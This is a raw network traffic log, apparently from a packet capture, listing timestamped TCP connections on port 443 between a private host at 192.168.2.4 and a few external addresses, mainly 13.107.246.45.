Oct 31, 2024 19:20:32.289794922 CET	443	51409	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.291795969 CET	443	51407	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.292107105 CET	51407	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.292140007 CET	443	51407	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.292467117 CET	51407	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.292485952 CET	443	51407	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.292547941 CET	443	51411	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.292788029 CET	51411	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.292804003 CET	443	51411	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.293112040 CET	51411	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.293118954 CET	443	51411	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.294353962 CET	443	51410	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.294569969 CET	51410	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.294579983 CET	443	51410	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.294884920 CET	51410	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.294889927 CET	443	51410	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.345709085 CET	443	51356	142.250.185.228	192.168.2.4
Oct 31, 2024 19:20:32.345808983 CET	443	51356	142.250.185.228	192.168.2.4
Oct 31, 2024 19:20:32.345882893 CET	51356	443	192.168.2.4	142.250.185.228
Oct 31, 2024 19:20:32.416932106 CET	443	51408	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.416997910 CET	443	51408	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.417073965 CET	51408	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.417359114 CET	51408	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.417373896 CET	443	51408	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.417387009 CET	51408	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.417392969 CET	443	51408	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.418554068 CET	443	51409	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.418581009 CET	443	51409	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.418638945 CET	51409	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.418662071 CET	443	51409	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.418979883 CET	443	51409	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.419033051 CET	51409	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.419359922 CET	51409	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.419368982 CET	443	51409	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.419393063 CET	51409	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.419399023 CET	443	51409	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.423264027 CET	51412	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.423305035 CET	443	51412	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.423342943 CET	443	51411	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.423378944 CET	443	51411	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.423427105 CET	51412	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.423451900 CET	51411	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.423463106 CET	443	51411	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.423480034 CET	443	51411	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.423554897 CET	51411	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.423659086 CET	51412	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.423674107 CET	443	51412	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.423779011 CET	51413	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.423820972 CET	443	51413	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.423954010 CET	51413	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.424097061 CET	51411	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.424103022 CET	443	51411	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.424113989 CET	51411	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.424118996 CET	443	51411	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.424307108 CET	51413	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.424319983 CET	443	51413	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.426724911 CET	51414	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.426734924 CET	443	51414	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.426808119 CET	51414	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.426935911 CET	51414	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.426947117 CET	443	51414	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.429049969 CET	443	51407	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.429560900 CET	443	51407	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.429559946 CET	443	51410	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.429584980 CET	443	51410	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.429626942 CET	443	51410	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.429652929 CET	51407	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.429652929 CET	51407	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.429656029 CET	51410	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.429671049 CET	51407	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.429677010 CET	443	51407	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.429682970 CET	51410	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.430639982 CET	51410	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.430655003 CET	443	51410	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.430665016 CET	51410	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.430670023 CET	443	51410	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.432827950 CET	51415	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.432840109 CET	443	51415	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.433197975 CET	51415	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.433510065 CET	51415	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.433521032 CET	443	51415	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.433798075 CET	51416	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.433820963 CET	443	51416	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.433943033 CET	51416	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.434114933 CET	51416	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.434132099 CET	443	51416	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.150691986 CET	443	51412	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.151287079 CET	51412	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.151324034 CET	443	51412	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.151834011 CET	51412	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.151839018 CET	443	51412	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.157517910 CET	443	51414	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.157845974 CET	51414	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.157855988 CET	443	51414	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.158250093 CET	51414	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.158255100 CET	443	51414	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.159735918 CET	443	51413	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.160017967 CET	51413	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.160054922 CET	443	51413	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.160399914 CET	51413	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.160404921 CET	443	51413	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.165199041 CET	443	51416	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.165513039 CET	51416	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.165528059 CET	443	51416	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.165931940 CET	51416	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.165936947 CET	443	51416	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.170593023 CET	443	51415	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.170857906 CET	51415	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.170872927 CET	443	51415	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.171199083 CET	51415	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.171202898 CET	443	51415	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.284713984 CET	443	51412	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.284786940 CET	443	51412	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.285028934 CET	51412	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.285264015 CET	51412	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.285286903 CET	443	51412	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.285298109 CET	51412	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.285304070 CET	443	51412	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.288729906 CET	443	51414	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.288791895 CET	443	51414	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.288897038 CET	51414	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.289000034 CET	51414	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.289011002 CET	443	51414	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.289021969 CET	51414	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.289026976 CET	443	51414	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.289088964 CET	51417	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.289132118 CET	443	51417	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.289230108 CET	51417	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.289485931 CET	51417	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.289499998 CET	443	51417	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.290941000 CET	443	51413	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.290972948 CET	443	51413	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.291032076 CET	443	51413	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.291045904 CET	51413	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.291073084 CET	51413	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.291230917 CET	51413	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.291249037 CET	443	51413	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.291260958 CET	51413	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.291266918 CET	443	51413	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.291493893 CET	51418	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.291543007 CET	443	51418	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.291610956 CET	51418	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.291722059 CET	51418	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.291738987 CET	443	51418	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.295181036 CET	51419	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.295192957 CET	443	51419	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.295315981 CET	51419	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.295531988 CET	51419	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.295541048 CET	443	51419	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.295548916 CET	443	51416	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.295579910 CET	443	51416	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.295614958 CET	51416	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.295627117 CET	443	51416	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.295663118 CET	51416	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.295818090 CET	51416	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.295824051 CET	443	51416	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.295839071 CET	51416	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.295842886 CET	443	51416	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.298441887 CET	51420	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.298491955 CET	443	51420	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.298722029 CET	51420	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.298722029 CET	51420	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.298763990 CET	443	51420	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.302076101 CET	443	51415	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.302098036 CET	443	51415	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.302150965 CET	51415	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.302161932 CET	443	51415	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.302205086 CET	443	51415	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.302237034 CET	51415	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.302354097 CET	51415	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.302361012 CET	443	51415	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.302371025 CET	51415	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.302375078 CET	443	51415	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.304436922 CET	51421	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.304467916 CET	443	51421	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.304699898 CET	51421	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.304699898 CET	51421	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:33.304728031 CET	443	51421	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:33.588263035 CET	51356	443	192.168.2.4	142.250.185.228
Oct 31, 2024 19:20:33.588294983 CET	443	51356	142.250.185.228	192.168.2.4
Oct 31, 2024 19:20:34.014652967 CET	443	51419	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.015294075 CET	51419	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.015317917 CET	443	51419	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.015832901 CET	51419	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.015840054 CET	443	51419	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.024883986 CET	443	51420	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.025199890 CET	51420	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.025218010 CET	443	51420	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.025454998 CET	443	51417	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.025535107 CET	51420	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.025541067 CET	443	51420	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.025799990 CET	51417	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.025818110 CET	443	51417	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.026101112 CET	51417	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.026107073 CET	443	51417	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.040718079 CET	443	51418	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.041126013 CET	51418	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.041157961 CET	443	51418	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.041496038 CET	51418	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.041502953 CET	443	51418	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.070820093 CET	443	51421	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.071444035 CET	51421	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.071456909 CET	443	51421	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.071949959 CET	51421	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.071954012 CET	443	51421	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.145998001 CET	443	51419	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.146073103 CET	443	51419	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.146244049 CET	51419	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.146565914 CET	51419	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.146591902 CET	443	51419	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.147277117 CET	51419	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.147284985 CET	443	51419	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.150371075 CET	51422	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.150402069 CET	443	51422	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.151093006 CET	51422	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.151093006 CET	51422	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.151133060 CET	443	51422	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.154710054 CET	443	51420	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.154792070 CET	443	51420	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.155334949 CET	51420	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.155334949 CET	51420	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.155334949 CET	51420	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.158382893 CET	51423	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.158416033 CET	443	51423	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.158647060 CET	51423	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.158647060 CET	51423	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.158674002 CET	443	51423	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.171483040 CET	443	51418	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.171694040 CET	443	51418	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.171753883 CET	51418	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.171798944 CET	51418	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.171818972 CET	443	51418	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.171830893 CET	51418	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.171837091 CET	443	51418	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.174387932 CET	51424	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.174421072 CET	443	51424	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.174501896 CET	51424	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.174669981 CET	51424	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.174685001 CET	443	51424	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.206062078 CET	443	51421	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.206166029 CET	443	51421	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.206227064 CET	443	51421	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.206276894 CET	51421	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.206276894 CET	51421	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.208003044 CET	51421	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.208018064 CET	443	51421	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.208049059 CET	51421	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.208055019 CET	443	51421	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.232265949 CET	51425	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.232321024 CET	443	51425	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.234215975 CET	51425	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.234379053 CET	51425	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.234395981 CET	443	51425	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.316234112 CET	443	51417	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.316274881 CET	443	51417	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.316318989 CET	443	51417	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.316401005 CET	51417	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.319331884 CET	51417	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.319333076 CET	51417	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.319355965 CET	443	51417	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.319369078 CET	443	51417	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.326208115 CET	51426	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.326247931 CET	443	51426	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.326325893 CET	51426	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.327857971 CET	51426	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.327873945 CET	443	51426	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.461719036 CET	51420	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.461743116 CET	443	51420	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.878500938 CET	443	51422	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.884824991 CET	51422	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.884839058 CET	443	51422	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.885417938 CET	51422	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.885422945 CET	443	51422	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.892494917 CET	443	51423	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.893802881 CET	51423	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.893831015 CET	443	51423	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.894344091 CET	51423	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.894351006 CET	443	51423	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.901077986 CET	443	51424	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.907264948 CET	51424	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.907280922 CET	443	51424	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:34.907731056 CET	51424	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:34.907738924 CET	443	51424	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:35.268151999 CET	443	51423	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:35.268167019 CET	443	51422	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:35.268196106 CET	443	51423	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:35.268214941 CET	443	51422	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:35.268239975 CET	443	51423	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:35.268383026 CET	51423	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:35.268779993 CET	443	51424	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:35.268830061 CET	51422	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:35.268830061 CET	51422	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:35.268841028 CET	443	51424	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:35.268873930 CET	51423	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:35.268874884 CET	51422	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:35.268891096 CET	443	51423	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:35.268893003 CET	443	51422	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:35.268898010 CET	51424	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:35.268928051 CET	51423	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:35.268937111 CET	443	51423	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:35.270078897 CET	443	51425	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:35.270863056 CET	51424	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:35.270869017 CET	443	51424	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:35.270879030 CET	51424	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:35.270884037 CET	443	51424	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:35.271159887 CET	443	51426	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:35.272161007 CET	51425	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:35.272196054 CET	443	51425	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:35.272646904 CET	51425	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:35.272654057 CET	443	51425	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:35.273097038 CET	51426	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:35.273108959 CET	443	51426	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:35.273487091 CET	51426	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:35.273490906 CET	443	51426	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:35.275707960 CET	51427	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:35.275738955 CET	443	51427	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:35.275804996 CET	51427	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:35.275923967 CET	51427	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:35.275938034 CET	443	51427	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:35.276565075 CET	51428	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:35.276601076 CET	443	51428	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:35.276649952 CET	51428	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:35.277054071 CET	51429	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:35.277074099 CET	443	51429	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:35.277122974 CET	51429	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:35.277158976 CET	51428	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:35.277170897 CET	443	51428	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:35.277262926 CET	51429	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:35.277270079 CET	443	51429	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:35.399794102 CET	443	51425	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:35.399821997 CET	443	51425	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:35.399868011 CET	443	51425	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:35.399880886 CET	51425	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:35.399920940 CET	51425	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:35.400266886 CET	51425	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:35.400285006 CET	443	51425	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:35.400295973 CET	51425	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:35.400300980 CET	443	51425	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:35.403441906 CET	51430	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:35.403487921 CET	443	51430	13.107.246.45	192.168.2.4
